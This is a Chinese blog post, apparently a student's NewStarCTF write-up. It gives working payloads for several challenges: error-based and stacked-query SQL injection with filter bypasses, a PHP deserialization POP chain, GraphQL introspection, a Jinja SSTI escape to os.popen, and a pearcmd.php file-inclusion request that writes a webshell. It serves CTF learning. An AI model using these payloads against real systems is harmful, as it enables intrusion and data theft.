NewStarCTF 公开赛赛道

最新推荐文章于 2024-04-27 12:30:07 发布
最新推荐文章于 2024-04-27 12:30:07 发布
阅读量862 收藏
点赞数 1
文章标签: 数据库 sql 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62129839/article/details/127395811
版权

week2:

1.报错注入,很简单,也没有任何过滤

playload:

1' union select updatexml(1,concat(0x5e,(select database()),0x5e),1) -- -

1' union select updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA='wfy ),0x5e),1) -- -

1' union select updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where TABLE_SCHEMA='wfy' and TABLE_NAME='wfy_admin' ),0x5e),1) -- -

reverse一下倒着取

1'||updatexml(1,concat(0x7e,(select reverse(group_concat(text)) from wfy_comments)),1)#

得到

最后将回显逆转

收获无

2.文件包含

 先进行一个代码审计

mt_rand()值为1219893521,伪随机,给了值,爆破出种子就行

if语句

md5($_POST['guess']) === md5(mt_rand())post guess

 playload:

 flag

收获base被禁用rot13

 3.UnserializeOne

反序列化,这类题我觉得是我比较薄弱的地方,好好研究研究:

 poc链我们这样分析,尾链是Sec-> invoke,倒推        

__invoke()         //当脚本尝试将对象调用为函数时触发

clone() //当把一个对象赋给另一个对象时自动调用

则Easy->call 能调用 eeee->clone eeee->clone的isset函数,则调用 star->isset

而this->func()是将对象当成函数调用触发_invoke()

destruct 中的echo 调用 toString中的check不存在方法触发easy->call

故:Start->__destruct 触发 Sec->__toString 触发 Easy->__call,easy->call中有clone语句,自动
触发 eeee->__clone 触发 Start->__isset 触发 Sec->invoke定义

详细解析覆盖变量:

Start->__destruct 触发 Sec->__toString :

$start->name =$sec;

Sec->__toString 触发 Easy->__call:

$Sec->obj = $ Easy;

Easy->__call触发eeee->__clone ,

eeee->__clone触发Start->__isset:

$eeee->obj=$Start;

最后$Start->isset中

 ($this->func)();

触发invoke完成构造

$Start->func=$sec;

总的playload:

<?php

class Start{

    public $name;

    public $func;

}

class Sec{

    public $obj;

    public $var;

}

class Easy{

    public $cla;

}

class eeee{

    public $obj;

}

$start = new Start();

$sec = new Sec();

$easy = new Easy();

$eeee = new eeee();

$eeee->obj = $start;

$sec->obj = $easy;

$sec->var = $eeee;

$start->name = $sec;

$start->func = $sec;

echo serialize($start);

?>

O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";N;}s:3:"var";O:4:"eeee":1:{s:3:"obj";r:1;}}s:4:"func";r:2;}

打好基础,收获蛮多的,反序列化我一直有大问题,但是一直没管,一直在见识跟多类型的题,学习跟多的知识点,但是这种热门的知识点反而掌握不牢固。过一段时间可能我会去尝试专项练题。巩固自己学到的东西。

4.ezAPI

第一次接触API

 意思是一个查询器

也确实是这样的,这个窗口能从他们数据库里拿数据,自然想到sql注入

过滤,找源码,很简单的源码泄露,直接www.zip就给了,其中有用段,我选取了出来

                <?php
                error_reporting(0);
                $id = $_POST['id'];
                function waf($str)
                {
                    if (!is_numeric($str) || preg_replace("/[0-9]/", "", $str) !== "") {
                        return False;
                    } else {
                        return True;
                    }
                }

                function send($data)
                {
                    $options = array(
                        'http' => array(
                            'method' => 'POST',
                            'header' => 'Content-type: application/json',
                            'content' => $data,
                            'timeout' => 10 * 60
                        )
                    );
                    $context = stream_context_create($options);
                    $result = file_get_contents("http://graphql:8080/v1/graphql", false, $context);
                    return $result;
                }

                if (isset($id)) {
                    if (waf($id)) {
                        isset($_POST['data']) ? $data = $_POST['data'] : $data = '{"query":"query{\nusers_user_by_pk(id:' . $id . ') {\nname\n}\n}\n", "variables":null}';
                        $res = json_decode(send($data));
                        if ($res->data->users_user_by_pk->name !== NULL) {
                            echo "ID: " . $id . "<br>Name: " . $res->data->users_user_by_pk->name;
                        } else {
                            echo "<b>Can't found it!</b><br><br>DEBUG: ";
                            var_dump($res->data);
                        }
                    } else {
                        die("<b>Hacker! Only Number!</b>");
                    }
                } else {
                    die("<b>No Data?</b>");
                }
                ?>

过滤了字符,sql注入不了

 file_get_contents函数,他是从graphql中拿数据,8080端口,意思是8080端口是可以种病毒的,我读不懂他这句话的意思,他可能是从graphql中拿数据,查一查

一种数据库

 

漏洞找到了,

内省查询语句是:

{"query":"\n    query IntrospectionQuery {\r\n      __schema {\r\n        queryType { name }\r\n        mutationType { name }\r\n        subscriptionType { name }\r\n        types {\r\n          ...FullType\r\n        }\r\n        directives {\r\n          name\r\n          description\r\n          locations\r\n          args {\r\n            ...InputValue\r\n          }\r\n        }\r\n      }\r\n    }\r\n\r\n    fragment FullType on __Type {\r\n      kind\r\n      name\r\n      description\r\n      fields(includeDeprecated: true) {\r\n        name\r\n        description\r\n        args {\r\n          ...InputValue\r\n        }\r\n        type {\r\n          ...TypeRef\r\n        }\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      inputFields {\r\n        ...InputValue\r\n      }\r\n      interfaces {\r\n        ...TypeRef\r\n      }\r\n      enumValues(includeDeprecated: true) {\r\n        name\r\n        description\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      possibleTypes {\r\n        ...TypeRef\r\n      }\r\n    }\r\n\r\n    fragment InputValue on __InputValue {\r\n      name\r\n      description\r\n      type { ...TypeRef }\r\n      defaultValue\r\n    }\r\n\r\n    fragment TypeRef on __Type {\r\n      kind\r\n      name\r\n      ofType {\r\n        kind\r\n        name\r\n        ofType {\r\n          kind\r\n          name\r\n          ofType {\r\n            kind\r\n            name\r\n            ofType {\r\n              kind\r\n              name\r\n              ofType {\r\n                kind\r\n                name\r\n                ofType {\r\n                  kind\r\n                  name\r\n                  ofType {\r\n                    kind\r\n                    name\r\n                  }\r\n                }\r\n              }\r\n            }\r\n          }\r\n        }\r\n      }\r\n    }\r\n  ","variables":null}

hackbar弄不起,不知道为啥

 

搜出来接口了,读不来,网上找怎么查询字段,学不会,网上的查询语句都很离谱。比较生气,看wp

playload:

data={"query":"query{\nffffllllaaagggg_1n_h3r3_flag{\nflag\n}\n}\n", "variables":null}

第三周:

第一题:ssti

?name={{1}}

很骚,{都不过滤,那真的是babyssti了

很骚,我babyssti都有问题,因为以前写笔记从来不写实例,又忘了很多,导致我一开始绕过绕的是这样的

?name={{''.[__'cla'+'ss'__].[__'ba'+'se'__]}}

卡了一会后面查了一会,发现不应该有.拼接也应该包裹全。

?name={{''['__cla'+'ss__']['__bas'+'es__'][0]['__subcl'+'asses__']()}}

然后就是找os,用脚本找,然后得到os在117位置

{{[].__class__.__base__.__subclasses__()[117].__init__['__glo'+'bals__']['os'].popen('id').read()}}

绕过过滤

?name={{''['__cla'+'ss__']['__bas'+'es__'][0]['__subcl'+'asses__']()[117]['__in'+'it__']['__glo'+'bals__']['popen']('id').read()}}

playload:

过滤了cat flag,tac,tail等绕过一下

{{''['__cla'+'ss__']['__bas'+'es__'][0]['__subcl'+'asses__']()[117]['__in'+'it__']['__glo'+'bals__']['popen']('tac /*').read()}}

得到flag

2.multiSQL

这道题,我不知道是网不好还是什么我库名都找不出来,一注入就断开链接,而且也没有被过滤的提示

1' union select updatexml(1,concat(0x5e,(select database()),0x5e),1) -- -

 看wp做题,updatexml被过滤,select被过滤,

updatexml被过滤,可以通过预编译来绕过, select过滤可以换成show

wp也链接错误,burp也发不过去,应该是服务器关了,那我就看一遍wp

先说说预编译吧,简单来说,预编译就是先set(定义)一个变量@a,然后prepare(准备)一个b从@a那获得,然后execute(执行) b,也就是变相地执行了@a的语句

当然我们还可以利用concat函数来联合@a里的内容,来绕过过滤

利用预编译绕过select 就能直接拿到flag了,构建payload

1.concat()绕过关键词

img

当然我们还可以利用concat函数来联合@a里的内容,来绕过过滤

img

利用预编译绕过select 就能直接拿到flag了,构建payload

实例:username=1';set @sql=concat('up','date score set listen=123 where username="火华"');prepare sql_exe FROM @sql;execute sql_exe#

2.hex()绕过 @a语句:

set @a = 0x7570646174652073636f726520736574206c697374656e203d2031303020776865726520757365726e616d65203d2027e781abe58d8e273b;prepare smtm_test from @a;execute smtm_test;#

0x7570646174652073636f726520736574206c697374656e203d2031303020776865726520757365726e616d65203d2027e781abe58d8e273b是hex(update score set listen = 100 where username = '火华';)

这里要注意这里是@sql=hex(update score set listen = 100 where username = '火华';);这里分号要注意

flag就没有了,连不上

3.rce

先看一下他的提示内容是什么,我们include本地内容

LFI

本地文件包含 Local File Include (LFI)

所包含文件内容符合PHP语法规范,任何扩展名都可以被PHP解析。

所包含文件内容不符合PHP语法规范,会暴露其源代码(相当于文件读取)。
RFI

远程文件包含 Remote File Include (RFI)

如果要使用远程包含功能,首先需要确定PHP是否已经开启远程包含功能选项(php默认关闭远程包含功能:allow_url_include=off),开启远程包含功能需要在php.ini配置文件中修改。

远程包含与本地包含没有区别,无非是支持远程加载,更容易getsh

没得到一点提示,然后

$_GET['file'].".php"他规定了后缀必须是php。

不会,这道题看了wp知道,他属于我的知识盲区。

Docker PHP裸文件本地包含综述 | 离别歌首先要研究这篇博客,其中提到的第6个点

pearcmd.php的巧妙利用

大致不介绍了,核心是语句,他能实现任意包含功能到固定文件

GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
Host: 192.168.1.162:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close

 发送这个数据包,目标将会写入一个文件/tmp/hello.php,其内容包含<?=phpinfo()?>

看了很久wp,觉得确实很精妙,他是一个这样的操作,先把一个eval(post=-)写入一个文件,相当于是一个🐎,然后我们在用include,进入写入的文件,再通过,post :-=system(‘’)来构造出攻击语句。

不知道哪有问题,flag出不来

4.thinkphp

页面错误!请稍后再试~

ThinkPHP V5.1.41 LTS { 十年磨一剑-为API开发设计的高性能框架 }

前面做过thinkphp的题目,反序列化

他给了thinkphp版本,直接对着找漏洞

Thinkphp5.1.37-5.1.41(最新版本) 反序列化漏洞复现与分析 - FreeBuf网络安全行业门户

这里有一个输入框
确定是反序列化漏洞

  服务器关了,

wp说这道题可以直接用网上的ep打,就是我上面那个网址

week 4:

1.rce:

$a绕过

陈崇拜者
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
华为中国大学生ICT大赛-网络技术赛道-WLAN知识资料
09-22
《华为中国大学生ICT大赛-网络技术赛道-WLAN知识资料》 在当今信息化社会,无线局域网(WLAN)已经成为我们日常生活和工作中不可或缺的一部分。华为作为全球领先的ICT解决方案提供商,其主办的“华为中国大学生ICT...
ICT比赛网络赛道题库
12-29
ICT比赛网络赛道题库 为2022年ICT比赛网络赛道题库,提供于ICT网络赛道省级初赛和复赛理论知识部分复习人员使用 一共有1100多道题目,其中大多数为往届题目和华为资格认证的题目,考试的时候是没有原题的,但是可以...
NewStarCTF2023week2-ez_sql
Welcome To Myon'Blog !
10-13 1000
闭合之后尝试判断字段数,存在WAF,使用大小写绕过(后面的sql语句也需要进行大小写绕过)尝试在表here_is_flag下查找flag。或者使用sqlmap直接跑出所有库和表内容。查一下数据库名、版本、用户等信息。查出数据库ctf下的表。
NewStarCTF week2 部分题解
Aiwin的博客
09-29 3184
NewStarCTF week2 尽力的某些题解
基于一道newstarctf中的逆向题学习XTEA解密_逆向 xtea算法
最新发布
2401_84253850的博客
04-27 635
这里也可以导入libum库,用flag += libum.n2s(res[0])[::-1] flag += libum.n2s(res[1])[::-1]“”“c语言中char元素是一个字节,而int元素通常是4个字节,所以一个32位无符号整数代表4个字符(一个字符通常是一个字节)”“”printf(“加密前原始数据:%u %u\n”,v[0],v[1]);printf(“加密后原始数据:%u %u\n”,v[0],v[1]);printf(“解密后原始数据:%u %u\n”,v[0],v[1]);
NewStarCTF week5 web 部分题解
qq_60829702的博客
10-23 517
[NewStarCTF] Give me your photo PLZ、Unsafe Apache、So Baby RCE Again、BabySSTI_Three解题记录以及心得体会
NewStarCTF 2023 WEEK1 Crypto
qq_63577068的博客
10-02 605
key=16*8*2=256bit,iv=16*8=128bit,256^128bit说明key的高位128bit不变,所以通过xor高128bit得到高位key的值*2还原key,iv=key^xor^1。每一个明文异或key,得到密文。最主要是要知道key值,就能逆推明文,一种就是,已知明文头是“flag”,用0xe9^ord("f"),0xe3^ord("l")得到key=143。凯撒密码,已知flag的头,kqfl->flag 相当于向前移动5位,key=5,得到。Brainfuck解密。
[NewStarCTF 2023] web题解
热门推荐
rev1ve的博客
10-16 1万+
分析一下,第一个if语句判断条件为上传的password参数的MD5值前六位为c4d038;和反引号去绕过对system函数的过滤,反斜杠绕过flag,tac替换cat命令。(多次尝试,发现回显的位置在5而不是1,开始卡了很久没回显)简单的文件包含,这里过滤了常见的转换过滤器base和rot。打开题目,发现是小游戏(题目跟最近打的SHCTF比较像)我们丢到重放器,发现是页面302状态,并且出现了提示。(这里用XFF不行,我用的是X-Real-IP)打开题目,提示我们传参两个数,然后帮我们计算。
NewStarCTF 公开赛赛道 第二周学习记录
m0_64815693的博客
10-03 2365
NewStarCTF 公开赛赛道 第二周学习记录
NewStarCTF 2023 第一阶段公开赛道部分wp
10-02
这是官方的wp文件,需要的可以下载查看
第十七届智能车竞赛线上比赛赛道设计草案.pdf
03-09
蓝桥杯,智能汽车比赛,方案,开源,源码,分享
NAIC2021比赛,AI+无线通信赛道初赛.zip
09-12
NAIC2021比赛,AI+无线通信赛道 ### 软件架构 #### Model_define_tf.py 为定义模型的代码,如encoder、decoder、量化层等,提交时就提交这个和训练好的模型权重 #### Model_train.py 为训练模型的代码 #### ...
NewStarCTF 公开赛赛道-WEEK1|REVERSE
qq_61774705的博客
10-07 2249
合起来就是:.flag{h3llo_rvers1ng_w0rld}加密思路就是:先把输入先base64编码->再异或字符串。解密思路就是:异或字符串->base64解码。
BUUCTF NewStarCTF 公开赛赛道Week2 Writeup
末初的CSDN博客
10-03 2315
BUUCTF NewStarCTF 公开赛赛道Week2 Writeup
Crypto(3)NewStarCTF 2023 公开赛道 WEEK2|Crypto-不止一个pi
m0_66039322的博客
10-19 240
很容易知道这道题考察的是。
CTF-WEB反序列化魔法方法调用情况
qq_61955196的博客
04-21 289
记录一下CTF-WEB反序列化魔法方法一些不太常见的调用情况
NewStarCTF2023week2-R!!C!!E!!(非常详细完整解题全过程)
Welcome To Myon'Blog !
10-15 971
preg_replace 函数:执行一个正则表达式的搜索和替换,\w表示非单词字符,单词字符包括:a-z、A-Z、0-9,以及下划线,加上取非^就成了匹配所有的单词字符,+表示可以进行多个匹配,还匹配了左括号和右括号 ,((?先用 getallheaders() 获取全部请求头信息,再用 array_flip() 反转键值,即将 ls / 放到键名的位置,因为 array_rand 是随机取一个键名,反转之后获取到的就是命令,如果没有进行反转,获取到的就是myon。4、源码泄露,常见的有:HG泄露;
KCC 新加坡邀您参加2023 MetaTrust CTF 热身赛
开源社KAIYUANSHE的博客
08-20 156
为了更好地培养大家的区块链安全感,我们特地准备了一场“区块链安全”热身赛。这也是为我们即将开启的2023 MetaTrust Web3 CTF 安全大赛掀开神秘面纱的第一幕,不管你是区块链安全小能手,还是新手上路,本次热身赛都是参与 CTF 大赛的重要必修课!参与热身赛,还有 SBT 奖励等你拿!参与热身赛,你将有机会获得扎实的学习经验和实战机会。同时,我们为挑战者准备了特别的奖励—— SBT ...
NewStarCTF 2023 公开赛道 Week2
Fab1an的博客
10-16 1261
时,得到的结果只是phpinfo()这个字符串,它只是将我们构造的array_rand(array_flip(getallheaders()))给执行了而已,所以我们要先用一个eval将array_rand(array_flip(getallheaders()))变为phpinfo();如果在后面,可以用array_reverse()将数组反转过来之后,再用current拿它,它在中间就不好搞了,又不能用next套娃,因为next的参数要是数组,第一次next完成之后就不是数组了,变成字符串了。
用python的turtle库画一个曲折的赛车赛道
03-18
使用Python的turtle库可以很方便地画出曲折的赛车赛道。下面是一个示例代码: ```python import turtle # 创建画布和画笔 canvas = turtle.Screen() canvas.bgcolor("white") pen = turtle.Turtle() pen.speed(0) # 设置赛道的曲线形状 def draw_curve(): for _ in range(90): pen.forward(1) pen.right(1) # 画出赛车赛道 def draw_race_track(): pen.penup() pen.goto(-200, 0) pen.pendown() pen.width(5) pen.color("black") for _ in range(2): draw_curve() pen.right(180) pen.penup() pen.goto(-200, -100) pen.pendown() pen.width(5) pen.color("black") for _ in range(2): draw_curve() pen.right(180) # 调用函数画出赛车赛道 draw_race_track() # 隐藏画笔 pen.hideturtle() # 关闭画布 canvas.exitonclick() ``` 这段代码使用turtle库创建了一个画布和一个画笔,然后定义了两个函数:`draw_curve()`用于绘制曲线形状,`draw_race_track()`用于绘制赛车赛道。最后调用`draw_race_track()`函数来画出赛车赛道

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值